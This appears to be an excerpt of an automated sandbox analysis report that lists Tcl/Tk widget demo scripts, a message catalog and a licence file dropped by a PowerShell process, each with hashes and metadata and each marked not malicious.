                                                                                                                                                                                                                      Preview:# label.tcl --..#..# This demonstration script creates a toplevel window containing..# several label widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .label..catch {destroy $w}..toplevel $w..wm title $w "Label Demonstration"..wm iconname $w "label"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "Five labels are displayed below: three textual ones on the left, and an image label and a text label on the right. Labels are pretty boring because you can't do anything with them."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....frame $w.left..frame $w.right..pack $w.left $w.right -side left -expand yes -padx 10 -pady 10 -fill both....label $w.left.l1 -text "First label"..label $w.left.l2 -text "Second label, raised" -relief raised..label $w.left.l3 -text "Third label, sunken" -reli
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1923
                                                                                                                                                                                                                      Entropy (8bit):4.805178632063492
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:gZzXeww+qjGQDvWG44IcigSA/9eCtUjupbriqWKt8FFE:MOKdSxligSA/kCtUju9iqWKt8FG
                                                                                                                                                                                                                      MD5:883B9DC598F25366D7C6865ED1416603
                                                                                                                                                                                                                      SHA1:1B5DF87EB765B803D02FA1DB4C43A9A53D1BC7FE
                                                                                                                                                                                                                      SHA-256:FB7F34EFFEFF03DDA13C4088FECECA6D266FFBD87D3DAD075A424C89305889E0
                                                                                                                                                                                                                      SHA-512:C07CC2D7DD8F01EA33A04A4882F61BE848306E37CB1A06D178E15468010EC2B365219B824ED1E0F22299FF1016989017501C889688EF7DF5C3EB258D9ADB77CD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# labelframe.tcl --..#..# This demonstration script creates a toplevel window containing..# several labelframe widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .labelframe..catch {destroy $w}..toplevel $w..wm title $w "Labelframe Demonstration"..wm iconname $w "labelframe"..positionWindow $w....# Some information....label $w.msg -font $font -wraplength 4i -justify left -text "Labelframes are\...used to group related widgets together. The label may be either \...plain text or another widget."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....# Demo area....frame $w.f..pack $w.f -side bottom -fill both -expand 1..set w $w.f....# A group of radiobuttons in a labelframe....labelframe $w.f -text "Value" -padx 2 -pady 2..grid $w.f -row 0 -column 0 -pady 2m -padx 2m....foreach value {1 2 3 4} {.. radiobutton $w.f.b
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2307
                                                                                                                                                                                                                      Entropy (8bit):5.135743409565932
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:XU/zAcKT6yOCaDBfsHLk32s3J5w83KDyP1BXy3JQz7yuC:XNc+92sg3A8uyDXy3JQnDC
                                                                                                                                                                                                                      MD5:F090D9B312C16489289FD39813412164
                                                                                                                                                                                                                      SHA1:1BEC6668F6549771DADC67D153B89B8F77DCD4B9
                                                                                                                                                                                                                      SHA-256:0D1E4405F6273F091732764ED89B57066BE63CE64869BE6C71EA337DC4F2F9B5
                                                                                                                                                                                                                      SHA-512:57B323589C5A8D9CBB224416731D8CE65C4B94146DF15CE30885DF63B1D0B3F709093B65390A911F84F20B7C5DE3C0AF9B4D7D531742BE046EDA6E8C3432EF6E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:This software is copyrighted by the Regents of the University of..California, Sun Microsystems, Inc., Scriptics Corporation, ActiveState..Corporation, Apple Inc. and other parties. The following terms apply to..all files associated with the software unless explicitly disclaimed in..individual files.....The authors hereby grant permission to use, copy, modify, distribute,..and license this software and its documentation for any purpose, provided..that existing copyright notices are retained in all copies and that this..notice is included verbatim in any distributions. No written agreement,..license, or royalty fee is required for any of the authorized uses...Modifications to this software may be copyrighted by their authors..and need not follow the licensing terms described here, provided that..the new terms are clearly indicated on the first page of each file where..they apply.....IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY..FOR DIRECT, INDIRECT, SPECIAL, INCI
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (516), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4476
                                                                                                                                                                                                                      Entropy (8bit):5.045008222015498
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:McObjjfXOHD9/ZhJg2T4w2zKEyStRXKn5pRR9:McObjjwx/UzKwa5R9
                                                                                                                                                                                                                      MD5:27D594BD6D682B27292413EC0AB179E8
                                                                                                                                                                                                                      SHA1:BC44CB0F1E46789389415CEA5BA42C291D4E52B9
                                                                                                                                                                                                                      SHA-256:737C1C78127865B8F3A359EC8F6D8675146547E043D9874F6E49D44680ED1C8A
                                                                                                                                                                                                                      SHA-512:0C370CD8D309FD74C678E02C5A2EAA0AEEA4A88AF195D1D3C0FB19C10FCE1D61916D2CC21D9DF76CB63F0EDD9BBD51FEA22C9E43E601BC4D8AC6E667817E73DC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# mclist.tcl --..#..# This demonstration script creates a toplevel window containing a Ttk..# tree widget configured as a multi-column listbox.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .mclist..catch {destroy $w}..toplevel $w..wm title $w "Multi-Column List"..wm iconname $w "mclist"..positionWindow $w....## Explanatory text..ttk::label $w.msg -font $font -wraplength 4i -justify left -anchor n -padding {10 2 10 6} -text "Ttk is the new Tk themed widget set. One of the widgets it includes is a tree widget, which can be configured to display multiple columns of informational data without displaying the tree itself. This is a simple way to build a listbox that has multiple columns. Clicking on the heading for a column will sort the data by that column. You can also change the width of the columns by dragging the boundary between them."..pack $w.msg -fill x....## See Code / Dismiss..pack [addSeeDis
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (598), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7469
                                                                                                                                                                                                                      Entropy (8bit):4.857137350317773
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:60Ong4o4niP/viWy9CHCRQkGTb/L+lV7LQuLwKce4pywQdlUpy96a58OA:60Og4o4UXBy6hzcQuL34Eldgpf
                                                                                                                                                                                                                      MD5:3D483F49668E50D1E255A9EE5C66C375
                                                                                                                                                                                                                      SHA1:C5CC1EC998775939F8A716360FDFD0EDC6C09E10
                                                                                                                                                                                                                      SHA-256:52AAE46CF874D84A8ACD8D68842DA19A93A7699CB5EF0DDD4D20B619FC274F7B
                                                                                                                                                                                                                      SHA-512:789772A87B1F6A142CB3F8B2E034C71AFD9699743561431176029600C375A14A6DAB858D2344CF9234F36B2E8B299CC4169E18911E5ABE4A8BA3A6D3DE0D1099
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# menu.tcl --..#..# This demonstration script creates a window with a bunch of menus..# and cascaded menus using menubars.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .menu..catch {destroy $w}..toplevel $w..wm title $w "Menu Demonstration"..wm iconname $w "menu"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left..if {[tk windowingsystem] eq "aqua"} {.. $w.msg configure -text "This window has a menubar with cascaded menus. You can invoke entries with an accelerator by typing Command+x, where \"x\" is the character next to the command key symbol. The rightmost menu can be torn off into a palette by selecting the first item in the menu."..} else {.. $w.msg configure -text "This window contains a menubar with cascaded menus. You can post a menu from the keyboard by typing Alt+x, where \"x\" is the character underlined on the menu. You can then traverse among the menu
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (336), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4342
                                                                                                                                                                                                                      Entropy (8bit):4.892701187301665
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:l3OMqaBQJm55CJumrMLHfw5aGmb504Aq/EqKG:l3OaQECdMLHfw5Q04AulKG
                                                                                                                                                                                                                      MD5:C1C5AE7AB232167841BE6074BCA56E38
                                                                                                                                                                                                                      SHA1:18CD79A2B27E0D24378701BEEE611921A8CC0693
                                                                                                                                                                                                                      SHA-256:727E4CC64E3CBE1C1EC0676F581BF884DF66C0819D8434DC854FBC211DCCC3A2
                                                                                                                                                                                                                      SHA-512:EB2B769A32178EA09907F1DD9E9584B2F2B91FCAAF4C2CDB81562BF9CCAE98B96E8234919668091331CDE9B0A951829A3231FCF1494444DB20E53992250BF5CB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# menubu.tcl --..#..# This demonstration script creates a window with a bunch of menus..# and cascaded menus using menubuttons.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .menubu..catch {destroy $w}..toplevel $w..wm title $w "Menu Button Demonstration"..wm iconname $w "menubutton"..positionWindow $w....frame $w.body..pack $w.body -expand 1 -fill both....menubutton $w.body.below -text "Below" -underline 0 -direction below -menu $w.body.below.m -relief raised..menu $w.body.below.m -tearoff 0..$w.body.below.m add command -label "Below menu: first item" -command "puts \"You have selected the first item from the Below menu.\""..$w.body.below.m add command -label "Below menu: second item" -command "puts \"You have selected the second item from the Below menu.\""..grid $w.body.below -row 0 -column 1 -sticky n..menubutton $w.body.right -text "Right" -underline 0 -direction right -menu $w.body.right.m -r
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2060
                                                                                                                                                                                                                      Entropy (8bit):4.849519550728985
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:Bj779XelpxH8q0RA9uglp134M+HKzST6iKDToaFKTeMDcF1OFnGlCMKzHQP6V:Bb9OlP8E5lp13R4SLZFKzcipLMK8k
                                                                                                                                                                                                                      MD5:FE18CFAA87E0C1D700E918E361B1C259
                                                                                                                                                                                                                      SHA1:FE95521ED2AB1322CB6FB28583CD59545EFED96B
                                                                                                                                                                                                                      SHA-256:652E236850C86D7F924514255174738BA71A1F7A7BA739AAE6734EBD328D5428
                                                                                                                                                                                                                      SHA-512:556EBE6BDFB39ABDD684675B275ACEA76CB1A5615D595B27FC54DB245887EF0B8D3FCD5A75CE08867E5C15BB437A87DCCB9B88777DDDD9B8078A22EB3F5820DE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# msgbox.tcl --..#..# This demonstration script creates message boxes of various type....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .msgbox..catch {destroy $w}..toplevel $w..wm title $w "Message Box Demonstration"..wm iconname $w "messagebox"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "Choose the icon and type option of the message box. Then press the \"Message Box\" button to see the message box."..pack $w.msg -side top....pack [addSeeDismiss $w.buttons $w {} {.. ttk::button $w.buttons.vars -text "Message Box" -command "showMessageBox $w"..}] -side bottom -fill x..#pack $w.buttons.dismiss $w.buttons.code $w.buttons.vars -side left -expand 1....frame $w.left..frame $w.right..pack $w.left $w.right -side left -expand yes -fill y -pady .5c -padx .5c....label $w.left.label -text "Icon"..frame $w.left.sep -relief ridge -bd 1 -height 2..pack $w.left.label -side
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6875
                                                                                                                                                                                                                      Entropy (8bit):4.697133716066944
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:sDK9wQCNMRXttyIsM36X5iHcDOi5iazOB1y327:EQCadtbjqX5iHcv327
                                                                                                                                                                                                                      MD5:2A3F03436E81A089F229A21978CE29CD
                                                                                                                                                                                                                      SHA1:6A013B791AC4A4E8C7AD0B188F38E17A08DF4984
                                                                                                                                                                                                                      SHA-256:F527E0117FEB1C9ACA6D06DDA1226C201E6DEAF89EFCA171175D08E80A9712AB
                                                                                                                                                                                                                      SHA-512:6F9909AFC37D75EAD97BC82E609D3F010A533EC5F0D571B35F712610489F81803FB51BF7A5D79AB8D8B372ABBA56D84B14E525D640FAABA352C1690F12DAA29C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:::msgcat::mcset nl "Widget Demonstration" "Demonstratie van widgets"..::msgcat::mcset nl "tkWidgetDemo" "tkWidgetDemo"..::msgcat::mcset nl "&File" "&Bestand"..::msgcat::mcset nl "About..." "Info..."..::msgcat::mcset nl "&About..." "&Info..."..::msgcat::mcset nl "<F1>" "<F1>"..::msgcat::mcset nl "&Quit" "&Einde"..::msgcat::mcset nl "Meta+Q" "Meta+E"..;# Displayed hotkey..::msgcat::mcset nl "Meta-q" "Meta-e"..;# Actual binding sequence..::msgcat::mcset nl "Ctrl+Q" "Ctrl+E"..;# Displayed hotkey..::msgcat::mcset nl "Control-q" "Control-e".;# Actual binding sequence..::msgcat::mcset nl "Dismiss" "Sluiten"..::msgcat::mcset nl "See Variables" "Bekijk Variabelen"..::msgcat::mcset nl "Variable Values" "Waarden Variabelen"..::msgcat::mcset nl "OK" "OK"..::msgcat::mcset nl "Run the \"%s\" sample program" "Start voorbeeld \"%s\""..::msgcat::mcset nl "Print Code" "Code Afdrukken"..::msgcat::mcset nl "Demo code: %s" "Code van Demo %s"..::msgcat::mcset nl "About Wi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (334), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1162
                                                                                                                                                                                                                      Entropy (8bit):4.747528723020147
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:0H14IYiWVUxXegXLhoKlchzh49UjrDq5p0z4kYUfDq/+qGX3l+y:mZYfVuXe+5lqDrD9DDqWqGnUy
                                                                                                                                                                                                                      MD5:89F6BFCBD527B31DFDD597C46B4BB551
                                                                                                                                                                                                                      SHA1:2D709CD49B4F2D18CDB9BEF15FA93A7E258AEBB6
                                                                                                                                                                                                                      SHA-256:D98E8A9BC5332D9DBF4F00382F840AF90CE95204B05326C56CC079C27182D811
                                                                                                                                                                                                                      SHA-512:BCB047C30FBAEA95C5A958EF9A8A703C468A1A9BADD25446E0035743EBC69FFB81AA3A6814776CA7DF3FF17B63059D6B9993E7FCAD4E6E2D21070F22248A08F3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# paned1.tcl --..#..# This demonstration script creates a toplevel window containing..# a paned window that separates two windows horizontally.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .paned1..catch {destroy $w}..toplevel $w..wm title $w "Horizontal Paned Window Demonstration"..wm iconname $w "paned1"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "The sash between the two coloured windows below can be used to divide the area between them. Use the left mouse button to resize without redrawing by just moving the sash, and use the middle mouse button to resize opaquely (always redrawing the windows in each position.)"..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....panedwindow $w.pane..pack $w.pane -side top -expand yes -fill both -pady 2 -padx 2m....label $w.pane.left -text
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (334), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2318
                                                                                                                                                                                                                      Entropy (8bit):4.753610976834485
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:bZYOouXewMXPkqmrD9NAeD/4+q8n4Qt7PgLrZd4IWHotgRC5eWFcHGv:NOwNLfQf84qUIJOnFcY
                                                                                                                                                                                                                      MD5:B3A38D0ABC2E5F329D7E4EC2ACD88EB3
                                                                                                                                                                                                                      SHA1:24E8FBCA6A5F3A874867A052FD3BE3EEF071870F
                                                                                                                                                                                                                      SHA-256:C7684877A618C5BAB0D0293662D76E5FDB231B479D8D9C0CB759E9AF586CE6B2
                                                                                                                                                                                                                      SHA-512:1DFFFBFCB81E015CA81E8B79EA1614298425CF1D9469E4E986A26CCDBE46145B6F7A9551FC048AA42A7227483D7A0A9DC3922900730B924D367F452E3C4C4A6C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# paned2.tcl --..#..# This demonstration script creates a toplevel window containing..# a paned window that separates two windows vertically.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .paned2..catch {destroy $w}..toplevel $w..wm title $w "Vertical Paned Window Demonstration"..wm iconname $w "paned2"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "The sash between the two scrolled windows below can be used to divide the area between them. Use the left mouse button to resize without redrawing by just moving the sash, and use the middle mouse button to resize opaquely (always redrawing the windows in each position.)"..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....# Create the pane itself..panedwindow $w.pane -orient vertical..pack $w.pane -side top -expand yes -fill both -pady 2
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (530), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7820
                                                                                                                                                                                                                      Entropy (8bit):4.9111945138052615
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:F6OiJP+LJNnbSzfBDjPcGBeFyZmmOEEJ+/5FB1w1b:kXiNnbwJ/HBf5F0F
                                                                                                                                                                                                                      MD5:EB1E5479056645C311E6E661616719A7
                                                                                                                                                                                                                      SHA1:187722884DFFF7CFBB428A1E27383680864BA456
                                                                                                                                                                                                                      SHA-256:A00D1F68FBCA9877A9F2269E324552A746F6A3BABFB651CBA0D39BA2BBA0E8C5
                                                                                                                                                                                                                      SHA-512:884022F385016898453899249E232CD7F3A6C090E0AD5BBBA28337A3B4A879EBDD691CC9FB9250BE7324A69F4A32D8057F9E62038568587ED0F1816A8743F707
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# pendulum.tcl --..#..# This demonstration illustrates how Tcl/Tk can be used to construct..# simulations of physical systems.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .pendulum..catch {destroy $w}..toplevel $w..wm title $w "Pendulum Animation Demonstration"..wm iconname $w "pendulum"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "This demonstration shows how Tcl/Tk can be used to carry out animations that are linked to simulations of physical systems. In the left canvas is a graphical representation of the physical system itself, a simple pendulum, and in the right canvas is a graph of the phase space of the system, which is a plot of the angle (relative to the vertical) against the angular velocity. The pendulum bob may be repositioned by clicking and dragging anywhere on the left canvas."..pack $w.msg....## See Code / Dismiss buttons..set btns [addSeeDism
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2854
                                                                                                                                                                                                                      Entropy (8bit):4.982879967446752
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:4dXe80pHq/Ol+eEJlAe1fAUVYIP7BWcJfyiyhbwGVnXss:6OBafaUVYIP7jqdhUGNss
                                                                                                                                                                                                                      MD5:883589810A9CC75DEE832D36C8096FB7
                                                                                                                                                                                                                      SHA1:0381F15183A7C57D40618BFAF05558477176AB66
                                                                                                                                                                                                                      SHA-256:897E231AEA6C393571494DC4279F3D2D0206A7405740C2F601A1CA01B076E1A1
                                                                                                                                                                                                                      SHA-512:F38D81509F5992E96399E90D5501C6D13E54221AA2DE037738F09B2CA02D11A610CD60B15CA508AC6CD1A0703D891ACD26266DA9AE9EC683B76CF3F44B428068
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# plot.tcl --..#..# This demonstration script creates a canvas widget showing a 2-D..# plot with data points that can be dragged with the mouse.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .plot..catch {destroy $w}..toplevel $w..wm title $w "Plot Demonstration"..wm iconname $w "Plot"..positionWindow $w..set c $w.c....label $w.msg -font $font -wraplength 4i -justify left -text "This window displays a canvas widget containing a simple 2-dimensional plot. You can doctor the data by dragging any of the points with mouse button 1."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....canvas $c -relief raised -width 450 -height 300..pack $w.c -side top -fill x....set plotFont {Helvetica 18}....$c create line 100 250 400 250 -width 2..$c create line 100 250 100 50 -width 2..$c create text 225 20 -text "A Simple Plot" -font $
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2685
                                                                                                                                                                                                                      Entropy (8bit):5.027337836193968
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:bCXeud7FBe7TEgIdqz+iES6Ky1P5JOnVlJxdAoQYUGdq02RaB+CnO:WOuo7TE7Npjf2LeGdEi+CnO
                                                                                                                                                                                                                      MD5:E1483F44122D7953E7FA747BDAE41F83
                                                                                                                                                                                                                      SHA1:5E4EC4DC87C7291B29EEC886FFBD30A45960840B
                                                                                                                                                                                                                      SHA-256:D0CAC223F23AF652A21A7BA4807177C968A5EDADD08F9BF046B1A0FFC9EAC154
                                                                                                                                                                                                                      SHA-512:A8C1B0AA329AA351EBF36ABEBFE487EDED3A70485285B290872E97ADAE82E67AE1343208E215628FFF49757D96A11DE7CDA6224E71310D9B66F7E8B91D9EA52C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# puzzle.tcl --..#..# This demonstration script creates a 15-puzzle game using a collection..# of buttons.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....# puzzleSwitch --..# This procedure is invoked when the user clicks on a particular button;..# if the button is next to the empty space, it moves the button into the..# empty space.....proc puzzleSwitch {w num} {.. global xpos ypos.. if {(($ypos($num) >= ($ypos(space) - .01))... && ($ypos($num) <= ($ypos(space) + .01))... && ($xpos($num) >= ($xpos(space) - .26))... && ($xpos($num) <= ($xpos(space) + .26)))... || (($xpos($num) >= ($xpos(space) - .01))... && ($xpos($num) <= ($xpos(space) + .01))... && ($ypos($num) >= ($ypos(space) - .26))... && ($ypos($num) <= ($ypos(space) + .26)))} {...set tmp $xpos(space)...set xpos(space) $xpos($num)...set xpos($num) $tmp...set tmp $ypos(space)...set ypos(space) $ypos($num)...set ypos($num) $
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (577), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2818
                                                                                                                                                                                                                      Entropy (8bit):4.828373479456453
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cZ/Xeua3LXY73LT3Jq+f/WUOi51DAoBOYODOYxEd+aajap1M4C8//ZUBcJ8w6fdv:6O1QLd6i51cSOYODOYWajeM49/KBcJ8P
                                                                                                                                                                                                                      MD5:9B05EADDF5E0235F3E55D2D3EACC84C9
                                                                                                                                                                                                                      SHA1:E18472638DF4592394372E3C7FA01903722CDDFB
                                                                                                                                                                                                                      SHA-256:5DCFE813B024DED726E728E75E8EC718B1A2491D4DAC47ADB2AE432AF0CD1F57
                                                                                                                                                                                                                      SHA-512:A9360077B13A2ADF64716CF573D097CA2773AE998AB2BBBA2C5025A5080DA005273CAE27BF34AC8A4CA60B703F7EB8800590153E17464D82564A768F2F133AC5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# radio.tcl --..#..# This demonstration script creates a toplevel window containing..# several radiobutton widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .radio..catch {destroy $w}..toplevel $w..wm title $w "Radiobutton Demonstration"..wm iconname $w "radio"..positionWindow $w..label $w.msg -font $font -wraplength 5i -justify left -text "Three groups of radiobuttons are displayed below. If you click on a button then the button will become selected exclusively among all the buttons in its group. A Tcl variable is associated with each group to indicate which of the group's buttons is selected. When the 'Tristate' button is pressed, the radio buttons will display the tri-state mode. Selecting any radio button will return the buttons to their respective on/off state. Click the \"See Variables\" button to see the current values of the variables."..grid $w.msg -row 0 -column 0 -columnspan 3 -s
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5526
                                                                                                                                                                                                                      Entropy (8bit):4.747547622090029
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dec32sxxwyPNxz1xrdaLrdL5daG8daQdamdaFdL0dLZRSVe1pfhqwa/wdRRxcuc1:QcLxnP1xrdYrdldUdbdhd+d4d2ejZqe6
                                                                                                                                                                                                                      MD5:B29BD430CBD38326898747067F58094B
                                                                                                                                                                                                                      SHA1:723DF35CFC666E471780E9801D3BE4B46E993C8E
                                                                                                                                                                                                                      SHA-256:DBD680E536B4EB2A2D733F96BBF3B5712E66A4A9E0A49F440F4668C6AC1B719A
                                                                                                                                                                                                                      SHA-512:2D29070AFF8B7F2FB3D4C9220E36C00BF804C678C869A53CDF18F9CC06E09B755E4FBE984941467137FB0F76485346387771889A8888E4D6AEF3496463C0AFE8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" ${1+"$@"}....# rmt --..# This script implements a simple remote-control mechanism for..# Tk applications. It allows you to select an application and..# then type commands to that application.....package require Tk....wm title . "Tk Remote Controller"..wm iconname . "Tk Remote"..wm minsize . 1 1....# The global variable below keeps track of the remote application..# that we're sending to. If it's an empty string then we execute..# the commands locally.....set app "local"....# The global variable below keeps track of whether we're in the..# middle of executing a command entered via the text.....set executing 0....# The global variable below keeps track of the last command executed,..# so it can be re-executed in response to !! commands.....set lastCommand ""....# Create menu bar. Arrange to recreate all the information in the..# applications sub-menu whenever it is cascaded to...... configure -menu [menu .menu]..menu .me
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with very long lines (399), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8501
                                                                                                                                                                                                                      Entropy (8bit):4.944830650086007
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:oUipadPAlVAHLhbohkzzNldBIm91Q2WIPn00:zPAjAHLhbo6CvIfl
                                                                                                                                                                                                                      MD5:D28A405B1E1FF907E6C97447882EB437
                                                                                                                                                                                                                      SHA1:41CCE7CA30625B2FA12500F3BD5B696F3E20BD8D
                                                                                                                                                                                                                      SHA-256:B995670A0AFE039AA2051E5FC3CA27A3A42FB1C359F3A32603500385037029C2
                                                                                                                                                                                                                      SHA-512:9A585535C55370E921D0F9A0EDC6D24483E8EFA8FF123BA2389CACCF8AEC750F12555E0F70E8B27FBC9F7E1933F2DCDD444652E2B90C97C170F71ADDDED12BFB
                                                                                                                                                                                                                      Malicious:false
